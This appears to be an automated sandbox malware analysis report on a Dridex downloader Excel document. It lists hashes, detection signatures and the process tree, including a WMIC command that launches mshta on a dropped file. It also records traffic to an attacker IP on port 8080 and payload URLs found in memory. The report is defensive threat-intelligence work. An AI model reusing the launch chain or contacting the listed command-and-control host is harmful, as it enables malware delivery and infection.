Loading ...

Play interactive tourEdit tour

Windows Analysis Report order 4544471372.xls

Overview

General Information

Sample Name:order 4544471372.xls
Analysis ID:532575
MD5:531039a455e1f0598cd201b785a1152a
SHA1:4880df9e94090243029e54a34e941c70298401c7
SHA256:cf0d6ea61f8e56f80f24792e356adeab2f92b6db2f980a9e5932415484f5b732
Tags:Dridexxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Sigma detected: TA505 Dropper Load Pattern
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Launches processes in debugging mode, may be used to hinder debugging
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 2804 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 5572 cmdline: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WmiPrvSE.exe (PID: 5344 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • mshta.exe (PID: 6096 cmdline: mshta C:\ProgramData\tCeltZ.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\tCeltZ.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: TA505 Dropper Load PatternShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: mshta C:\ProgramData\tCeltZ.rtf, CommandLine: mshta C:\ProgramData\tCeltZ.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 5344, ProcessCommandLine: mshta C:\ProgramData\tCeltZ.rtf, ProcessId: 6096
      Sigma detected: Suspicious MSHTA Process PatternsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: mshta C:\ProgramData\tCeltZ.rtf, CommandLine: mshta C:\ProgramData\tCeltZ.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 5344, ProcessCommandLine: mshta C:\ProgramData\tCeltZ.rtf, ProcessId: 6096
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2804, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", ProcessId: 5572
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2804, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", ProcessId: 5572

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: order 4544471372.xlsReversingLabs: Detection: 13%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Source: global trafficTCP traffic: 192.168.2.7:49816 -> 149.129.254.152:8080
      Source: global trafficTCP traffic: 192.168.2.7:49816 -> 149.129.254.152:8080
      Source: global trafficTCP traffic: 192.168.2.7:49816 -> 149.129.254.152:8080
      Source: Joe Sandbox ViewIP Address: 149.129.254.152 149.129.254.152
      Source: unknownTCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: unknownTCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: unknownTCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: unknownTCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: mshta.exe, 0000001A.00000002.534688222.0000020F08921000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.1524
      Source: mshta.exe, 0000001A.00000002.534688222.0000020F08921000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8
      Source: mshta.exe, 0000001A.00000003.469090020.0000020F08971000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/
      Source: mshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/6llr
      Source: mshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/6tf
      Source: mshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfc
      Source: mshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfuSVZF2
      Source: mshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gp
      Source: mshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534554271.0000020F088F8000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpen
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3da
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dad
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dadV
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5H
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6c
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
      Source: mshta.exe, 0000001A.00000003.469056454.000002170B64B000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.538705158.000002170B64E000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc3
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcY
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcZ
      Source: mshta.exe, 0000001A.00000002.534688222.0000020F08921000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080d-
      Source: mshta.exe, 0000001A.00000002.534688222.0000020F08921000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.ingsb6
      Source: EXCEL.EXE, 00000000.00000002.543373563.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesb
      Source: EXCEL.EXE, 00000000.00000002.541727751.000000000F500000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
      Source: EXCEL.EXE, 00000000.00000002.539687730.000000000D80C000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
      Source: EXCEL.EXE, 00000000.00000003.396495769.0000000015C73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.399131900.0000000015C42000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396289594.0000000015D2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396429856.0000000015C42000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396246170.0000000015CE5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
      Source: EXCEL.EXE, 00000000.00000003.399131900.0000000015C42000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396429856.0000000015C42000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
      Source: EXCEL.EXE, 00000000.00000003.396495769.0000000015C73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396289594.0000000015D2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396246170.0000000015CE5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000002.543668539.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350357731.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383432005.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459478979.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397090354.0000000013090000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledq
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticatedBearer
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query6H
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.260270306.0000000012FD9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeH
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
      Source: EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460764651.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiB
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiN
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.aadrm.com
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.aadrm.com/
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
